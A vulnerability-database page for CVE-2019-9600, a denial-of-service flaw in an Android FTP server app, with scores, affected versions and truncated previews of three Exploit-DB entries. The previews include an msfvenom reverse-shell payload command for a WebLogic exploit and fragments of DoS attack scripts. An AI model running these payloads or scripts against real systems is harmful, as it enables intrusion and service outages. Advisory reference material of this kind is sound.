CVE-2019-9600
published 2019-03-06CVE-2019-9600: The Olive Tree FTP Server (aka com.theolivetree.ftpserver) application through 1.32 for Android allows remote attackers to cause a denial of service via a…
PriorityP347high7.5CVSS 3.0
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
8.30%
94.2th percentile
The Olive Tree FTP Server (aka com.theolivetree.ftpserver) application through 1.32 for Android allows remote attackers to cause a denial of service via a client that makes many connection attempts and drops certain packets.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| theolivetree | ftp_server | <= 1.32 | — |
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
exploitdb·2019-04-30·CVSS 9.8
CVE-2019-2725 [CRITICAL] Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash K
Exploit-DB
Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)
exploitdb·2019-03-12
Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)
Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)
---
# Exploit Title: Core FTP 2.0 build 653 - 'PBSZ' - Unauthenticated - Denial of Service (PoC)
# Date: 2019-03-12
# Exploit Author: Hodorsec ([email protected] / [email protected])
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://coreftp.com/server/download/archive/CoreFTPServer653.exe
# Version: Version 2.0, build 653, 32-bit
# Tested on: Windows 8.1 6.3 (build 9600)
# CVE: N/A
# Description:
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size"
# and CoreFTP responds unauthenticated.
# The PBSZ command in CoreFTP only allows for a certain length of the string to be vulnerable to a DoS.
# This script triggers the DoS and fill
Exploit-DB
FTP Server 1.32 - Denial of Service
exploitdb·2019-02-28
CVE-2019-9600 FTP Server 1.32 - Denial of Service
FTP Server 1.32 - Denial of Service
---
#!/usr/bin/env python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * FTP Server 1.32 Remote Denial of Service (DoS) *
# ************************************************************************
# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS)
# Date: 2019-02-26
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor: The Olive Tree
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Category: Mobile Apps
# Version: \n"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
target_ip = socket.gethostbyname(target)
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( tar
No writeups or analysis indexed.
2019-03-06
Published